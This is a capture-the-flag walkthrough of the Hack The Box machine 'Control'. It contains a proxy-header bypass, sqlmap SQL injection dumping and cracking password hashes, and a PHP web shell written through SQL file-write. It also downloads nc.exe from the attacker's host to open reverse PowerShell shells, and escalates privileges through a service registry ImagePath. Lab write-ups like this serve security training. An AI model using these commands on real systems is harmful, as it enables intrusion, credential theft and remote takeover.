Control HTB

Updated:November 3, 2021 pm

Hello fellow hackers,

This is the writeup for Control box.

As Always I did a port scan with the famous nmap and got 3 ports open.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql?
| fingerprint-strings: 
|   NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SMBProgNeg, TLSSessionReq, TerminalServerCookie, X11Probe, afp, giop: 
|_    Host '10.10.14.41' is not allowed to connect to this MariaDB server

Port 80

Homepage

I can tell from now this uses php(index.php). Inside the source code I see a comment

  <!-- To Do:
			- Import Products
			- Link to new payment system
			- Enable SSL (Certificates location \\192.168.4.28\myfiles)
<!-- Header -->

After poking the website I see that admin.php is not accessible. Because it requires us to go through a proxy.

proxy

Searching about headers I found out that header X-Forwarded-For is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy

So I open burp suite and intercept the request to 10.10.10.167/admin.php and add the IP address found in the index.php html code.

bypassproxy

Now I add into burp suite math and replace the X-Forwarded-For, so burp can add that automatically to us.

match_and_replace

Inside the admin app I can add, search, update, create products. I send each request on burp and try to find any vuln on the send parameters. I found out that search products is vulnerable to sql injection. After trying a sleep command. My request took long to respond back.

vulnpoint

I copy the request to a file and then update the parameter to be productName=* . And then give it to sqlmap to extract info for us.

First I get all the databases with sqlmap -r sqlinjection.req --dbs --batch

[*] information_schema
[*] mysql
[*] warehouse

After get all mysql tables with sqlmap -r sqlinjection -D mysql --tables --batch

Database: mysql
[31 tables]
+---------------------------+
| db                        |
| event                     |
| user                      |
| column_stats              |
| columns_priv              |
| func                      |
| general_log               |
| global_priv               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |

After get the content of user row sqlmap -r sqlinjection.req -D mysql -T user --dump

root: 0A4A5CAD344718DC418035A1F4D292BA603134D8
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9D

Add the hashes inside a file and then crack them hashcat -m 300 crackme.txt rockyou.txt

root: 0A4A5CAD344718DC418035A1F4D292BA603134D8 
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA * l3tm3!n
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9D l33th4x0rhector
  • The manager hash was cracked with sqlmap sqlmap -r sqlinjection.req -D mysql -T user --dump --batch

Let’s see again if we can upload a shell to the webserver and then access the server.
To do this first I check which users is managing the mysql database. sqlmap -r sqlinjection.req --current-user --batch

current user: 'manager@localhost'

And then check the privileges of that user. sqlmap -r sqlinjection.req --privileges --batch

[*] 'manager'@'localhost' [1]:
    privilege: FILE

which means we can indeed upload a file into the webserver.
I create a file and add a simple php command to execute everything I give into the fuxsocy parameter.

<?php echo system($_GET['fuxsocy']); ?>

To upload a file I use sqlmap -r sqlinjection.req --file-write=q.php --file-dest=/inetpub/wwwroot/q.php --batch

I had to guess for the destination by trying possible directories found here

Then I visit the webpage and download nc.exe from my box and execute it to get a reverse shell.

10.10.10.167/q.php?fuxsocy=curl 10.10.X.X/nc.exe > C:\Windows\Temp\nc.exe (add a webserver first with python3 -m http.server 80)
10.10.10.167/q.php?fuxsocy=C:\Windows\Temp\nc.exe 10.10.X.X 9999 -e powershell.exe
kali@kali:~$ rlwrap nc -nvlp 9999
listening on [any] 9999 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.10.167] 50431
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot> whoami
whoami
nt authority\iusr
PS C:\inetpub\wwwroot>

Because I have the password for user hector I created a script to impersonate that user and then download the nc.exe and after get a shell back as that user.

$pass = ConvertTo-SecureString "l33th4x0rhector" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Fidelity\\hector", $pass)
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {curl http://10.10.X.X/nc.exe -O C:\Users\hector\Desktop\nc.exe}
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {C:\Users\hector\Desktop\nc.exe 10.10.X.X 8888 -e powershell}

hektor_user

User obtained.

The root part has to do with windows registry. To spot that we had to look into the users powershell history.

PS C:\Users\Hector\Documents> (Get-PSReadLineOption).HistorySavePath
(Get-PSReadLineOption).HistorySavePath
C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Hector\Documents> type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
PS C:\Users\Hector\Documents>

Running get-acl HKLM:\SYSTEM\CurrentControlSet\services* | format-list

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow  FullControl
         NT AUTHORITY\Authenticated Users Allow  ReadKey
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         CONTROL\Hector Allow  FullControl <--- USER HERE HAS FULLCONTROL
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
Audit  : 
Sddl   : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KA;;;S-1-5-21-3271572904-80546332
         -2170161114-1000)(A;CI;KR;;;AC)

This means we can edit registries for a service and then execute malicious code which in our case is a reverse shell as administrator. First let’s see the services what hector has access to by issuing this command.
Get-acl HKLM:\System\CurrentControlSet\Services\* | Format-List * | findstr /i "Hector Users Path" This gives us a big list with the proccess name. We would choose wuauserv.

PS C:\Users\Hector\Documents> Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv
Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv


    Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services


Name                           Property                                                                                
----                           --------                                                                                
wuauserv                       DependOnService     : {rpcss}                                                           
                               Description         : @%systemroot%\system32\wuaueng.dll,-106                           
                               DisplayName         : @%systemroot%\system32\wuaueng.dll,-105                           
                               ErrorControl        : 1                                                                 
                               FailureActions      : {128, 81, 1, 0...}                                                
                               ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p                     
                               ObjectName          : LocalSystem                                                       
                               RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege,                       
                               SeCreatePageFilePrivilege, SeTcbPrivilege...}                                           
                               ServiceSidType      : 1                                                                 
                               Start               : 3                                                                 
                               SvcMemHardLimitInMB : 246                                                               
                               SvcMemMidLimitInMB  : 167                                                               
                               SvcMemSoftLimitInMB : 88                                                                
                               Type                : 32                                                                


PS C:\Users\Hector\Documents> 

I am using the wuauserv service as this service is the service windows use to check if an update is available and then stops so this should have a good chance to be inactive.

Let’s edit the ImagePath

Addreg

setup listener and download nc then start the service.

end